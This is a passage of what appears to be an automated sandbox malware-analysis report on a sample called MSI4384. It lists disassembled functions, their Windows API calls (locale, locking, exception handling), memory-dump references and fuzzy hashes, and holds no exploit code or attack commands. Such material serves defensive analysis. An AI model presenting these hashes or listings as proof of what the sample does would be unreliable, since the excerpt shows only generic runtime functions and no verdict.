                                                                      • Part of subcall function 004495A8: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07), ref: 004495B3
                                                                      • Part of subcall function 004495A8: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07,?,?,?,F3E52339), ref: 004495ED
                                                                    • GetProcessHeap.KERNEL32 ref: 004225F5
                                                                      • Part of subcall function 00449557: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449561
                                                                      • Part of subcall function 00449557: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449594
                                                                      • Part of subcall function 00449557: WakeAllConditionVariable.KERNEL32(00483B70,?,?,004226B7,00484714,0046EC90), ref: 0044959F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease$ConditionHeapProcessVariableWake
                                                                    • String ID: 4GH
                                                                    • API String ID: 1755742941-454853694
                                                                    • Opcode ID: 99daf8276656587df754f48f9016be78ee66ce967d92ade352eff8531fa676b7
                                                                    • Instruction ID: 7da042a08237656f061581ffc8fd6a40b537e182556edabae8a647701a676b4d
                                                                    • Opcode Fuzzy Hash: 99daf8276656587df754f48f9016be78ee66ce967d92ade352eff8531fa676b7
                                                                    • Instruction Fuzzy Hash: FB217AB1900202EFE710EF58E94678E77E0F786724F614A3EE42197390E7B919008B9E
                                                                    Function 004537DC Relevance: 2.9, Strings: 2, Instructions: 352COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =E$5
                                                                    • API String ID: 0-1608099182
                                                                    • Opcode ID: 80d743ce86f3f7115c781691013d5d710c6c7ccd326cb6f5c66471442a49c31f
                                                                    • Instruction ID: 2aeb48bb7a1bbab531cb61505ebe1b0d6c3b1bbdc82363d52d15805ad22b2510
                                                                    • Opcode Fuzzy Hash: 80d743ce86f3f7115c781691013d5d710c6c7ccd326cb6f5c66471442a49c31f
                                                                    • Instruction Fuzzy Hash: 89C10471F042499BDF18CE6988516EEBBF29F84383F18806AEC51E7343D6389E49C759
                                                                    Function 0045F7A4 Relevance: 1.9, APIs: 1, Instructions: 409timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0045FBE9,00000000,00000000,00000000), ref: 0045FAA9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InformationTimeZone
                                                                    • String ID:
                                                                    • API String ID: 565725191-0
                                                                    • Opcode ID: 52c85d81806259ef10026d78cd5d3b420c38ad83f7b91f6c0799ded620a11b2c
                                                                    • Instruction ID: 56fd7aabe0cbcb3df438d18f262c83bb4d0153ae4a5e521c1ea32790af5b79f3
                                                                    • Opcode Fuzzy Hash: 52c85d81806259ef10026d78cd5d3b420c38ad83f7b91f6c0799ded620a11b2c
                                                                    • Instruction Fuzzy Hash: EFD12771900215ABDB11BFA5DC02A6F77A9EF44715F20443BED04EB292E7389E0DC79A
                                                                    Function 00460150 Relevance: 1.8, APIs: 1, Instructions: 263COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,00000008,?,?,?,0046013E,?,?,00000008,?,?,0046A7DE,00000000), ref: 00460398
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: f22ab964bad6f0fe07ea2c77052751dfdaad0bf41760081db8f0ef68362552da
                                                                    • Instruction ID: 6a88dbdbde6e452ff1522d9a873faab9aa3a74aa41c88a3f2ef3a00981dffe55
                                                                    • Opcode Fuzzy Hash: f22ab964bad6f0fe07ea2c77052751dfdaad0bf41760081db8f0ef68362552da
                                                                    • Instruction Fuzzy Hash: 5BB16C315106088FD719CF28C49AB667BE0FF45364F24869AE89A8F3E1D739ED81CB45
                                                                    Function 00449CEC Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00449D02
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: b13c0aa5b56bf1e1605381ac47ad109b6ee084d91d931b83e315ff7a8ddb61f3
                                                                    • Instruction ID: c1de12176b0c614d6cb9e9e5d423dc18728e8591b3f29c137e9b3440fecd8c8d
                                                                    • Opcode Fuzzy Hash: b13c0aa5b56bf1e1605381ac47ad109b6ee084d91d931b83e315ff7a8ddb61f3
                                                                    • Instruction Fuzzy Hash: 7DA179B1D102148FEB19CF64D9816AEBBF1FB48324F24852ED606EB390C3B99940DF58
                                                                    Function 00451ACC Relevance: 1.7, Strings: 1, Instructions: 466COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 2448ca7ccb932cd75ddc7525e62df85392d361aa494da7890d0ec7d90038d073
                                                                    • Instruction ID: e0dd302899160a8f5f8202a4fd193a79dd1ea789f3603fc26f0fa119c0bf05f4
                                                                    • Opcode Fuzzy Hash: 2448ca7ccb932cd75ddc7525e62df85392d361aa494da7890d0ec7d90038d073
                                                                    • Instruction Fuzzy Hash: E802B130A046058FCB25CF68C580BAAB7F1FF45316F24461FD8569B3A2D739AD4ACB19
                                                                    Function 0045168D Relevance: 1.6, Strings: 1, Instructions: 399COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 2a8ff23ce24f8046767adeb51c467b085ae2074034c0537849e1262018e4a8bb
                                                                    • Instruction ID: 0f3837e6628e7efda9e20e692e76a8cb8a212857e723b67922da1749ffd9dd65
                                                                    • Opcode Fuzzy Hash: 2a8ff23ce24f8046767adeb51c467b085ae2074034c0537849e1262018e4a8bb
                                                                    • Instruction Fuzzy Hash: A8E1CC74A006068FCB25CF69C590BABBBB1AB09306F14461FDC5297763D73CAC4ACB59
                                                                    Function 00464DB0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00464E00
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 71d201153cf92b5d80883ee3da9a8e1d3dc1151d3d68e332aca84a5e5d520e3c
                                                                    • Instruction ID: ae045421f66625fd3b37e1e4838ea151670fe58a260f7ad30d00b8576444f513
                                                                    • Opcode Fuzzy Hash: 71d201153cf92b5d80883ee3da9a8e1d3dc1151d3d68e332aca84a5e5d520e3c
                                                                    • Instruction Fuzzy Hash: 74217F31A11206ABEF28AA25DD41B7B73A8EF85319F10007BED01D6141F77AAD44C69A
                                                                    Function 00464A1E Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464B50,00000001), ref: 00464A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: a59a71e66666f57d27b09e199c19fa17b7d7b501db9eef9ed5b549d8aabda89b
                                                                    • Instruction ID: e398204a1bffda33c6b0f890ccd29849c1da80c1c3edfe3b3eeba93ccde4fddd
                                                                    • Opcode Fuzzy Hash: a59a71e66666f57d27b09e199c19fa17b7d7b501db9eef9ed5b549d8aabda89b
                                                                    • Instruction Fuzzy Hash: 2411253A6007019FDF18AF79C8916BAB792FFC0368B15452EE98687B40E375B842C744
                                                                    Function 00464FDB Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00464D6D,00000000,00000000,?), ref: 00465007
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 917e1a149b80b36a6ac6acc9ef16a08aa92ebbbbcf9ef67730afaa5cc806ef02
                                                                    • Instruction ID: 4e417a61c9bafded9479b447349d6549196c62d6f0ada66a01e535af3eeea587
                                                                    • Opcode Fuzzy Hash: 917e1a149b80b36a6ac6acc9ef16a08aa92ebbbbcf9ef67730afaa5cc806ef02
                                                                    • Instruction Fuzzy Hash: F301F936710612FBDB285A25CC05BBB3769EB40754F15443AEC02A3281FA7CFD41C6D6
                                                                    Function 00464AB9 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464DB0,00000001), ref: 00464B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: 21e181757518e253d036f3f4eb825293fa341d98335b16a56e4b254024b4f36b
                                                                    • Instruction ID: 263fc79ae1a6490a7fd468f627805f61e84e72980e5c71f89e1735a8d042c465
                                                                    • Opcode Fuzzy Hash: 21e181757518e253d036f3f4eb825293fa341d98335b16a56e4b254024b4f36b
                                                                    • Instruction Fuzzy Hash: 19F0C2363003046FDF245F75D881A6B7B95EFC1768B15442EF9458B680E6B5AC418698
                                                                    Function 00448F9C Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00446A10,00000000,0047A8D9,00000004,00445628,0047A8D9,00000004,00445A57,00000000,00000000), ref: 00448FB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 1aff8709dd50e347ab2dcf90a360b3293fc03711b192c8585241af364ebcb494
                                                                    • Instruction ID: fb2252ea0ef1ae45888c8b799d0a1765396b4687d7d7a952ee86332780af2405
                                                                    • Opcode Fuzzy Hash: 1aff8709dd50e347ab2dcf90a360b3293fc03711b192c8585241af364ebcb494
                                                                    • Instruction Fuzzy Hash: 33E09B32760200E6F7258B799D1EF7F76DDD701746F00455BE603E52C1DEA8CE049255
                                                                    Function 004649D1 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464930,00000001), ref: 00464A0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: b4700be1b4a25c64ba35818f5096cdc99540a416a60dfa6fb94ebdba90275087
                                                                    • Instruction ID: 441beaa02857093e0f88f74d9263363c78869addeed308bc4035ab0f794507d0
                                                                    • Opcode Fuzzy Hash: b4700be1b4a25c64ba35818f5096cdc99540a416a60dfa6fb94ebdba90275087
                                                                    • Instruction Fuzzy Hash: F5F0553A3402049BCF14AF35E8466ABBF90EFC2710B46406AEE09CB251E2799847C798
                                                                    Function 004649D3 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464930,00000001), ref: 00464A0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: e377a30baaddb5f37a0491e59171569e524e7683eda7b937440af5b1ffe62f32
                                                                    • Instruction ID: a93497f2e18baa747161d8a301a655c3174e94bf7390d4b5b20b4c01ff00407e
                                                                    • Opcode Fuzzy Hash: e377a30baaddb5f37a0491e59171569e524e7683eda7b937440af5b1ffe62f32
                                                                    • Instruction Fuzzy Hash: 68F0553A34020497CF14AF35E80566BBF90EFC2710B46406AEE09CB251E2799847C798
                                                                    Function 0045EDE2 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004594A1: EnterCriticalSection.KERNEL32(?,?,00462907,00000000,004803B8,0000000C,0046289B,?,?,0045ED86,?,?,0045D0E3,00000001,00000364,00000000), ref: 004594B0
                                                                    • EnumSystemLocalesW.KERNEL32(Function_0003EDC0,00000001,004802B8,0000000C,0045F277,?), ref: 0045EE14
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                    • String ID:
                                                                    • API String ID: 1272433827-0
                                                                    • Opcode ID: c682aa7db7493b9e33ef646ac137b9ee9e20b12750eb32c93f5787c351a837e5
                                                                    • Instruction ID: 45e47926b2d75771e42adecdfef62ee81197ad3ed10335b134aad41d5f12bbce
                                                                    • Opcode Fuzzy Hash: c682aa7db7493b9e33ef646ac137b9ee9e20b12750eb32c93f5787c351a837e5
                                                                    • Instruction Fuzzy Hash: 60F09036A50701DFE700DF99D446B9D77B0EB4972AF10852BE9119B2D1C7B94A04CF44
                                                                    Function 0045F310 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0045C6FA,?,20001004,00000000,00000002,?,?,0045BCF8), ref: 0045F344
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 5d5841d5ae089be0458325db33b1100aeb006916627717fad26333934595d02d
                                                                    • Instruction ID: 09850a62e4c59d6c062a8b4e7035586d728c2294282eebfd047f234bb889da38
                                                                    • Opcode Fuzzy Hash: 5d5841d5ae089be0458325db33b1100aeb006916627717fad26333934595d02d
                                                                    • Instruction Fuzzy Hash: 71E0D832000118B7CF022F61DC08ADE3E16EF04762F004031FC0151122DB758D299ADE
                                                                    Function 0044A385 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002A3A0,00449B25), ref: 0044A38A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: ecfb5bed9d022a144f99d675e5c68abc80d4e96c41a53820b95d76ec0bdb892a
                                                                    • Instruction ID: 3cb8b122aec8348a8a91008d03012fc6e4ca8c9ef0ee5e731528697700c23641
                                                                    • Opcode Fuzzy Hash: ecfb5bed9d022a144f99d675e5c68abc80d4e96c41a53820b95d76ec0bdb892a
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 00458393 Relevance: .7, Instructions: 686COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 11fe4f66e403a4e7242daaaaa58a954bb6b35cb6a954825ec3dcf2436c072e97
                                                                    • Instruction ID: 391dbbbe485b32d2d56505d5660239cef9f4b0fa71fe327a7f3f06d65def5326
                                                                    • Opcode Fuzzy Hash: 11fe4f66e403a4e7242daaaaa58a954bb6b35cb6a954825ec3dcf2436c072e97
                                                                    • Instruction Fuzzy Hash: EE425B74D0020A9FCF18CF98C981ABEBBB5FF45305F14416EDD45A7306EA35AA4ACB84
                                                                    Function 0045FDF0 Relevance: .2, Instructions: 230COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47398b504f268ddfd47b1332cbc19df07ffa87418bf3a7d3219e7420ec3f8f4e
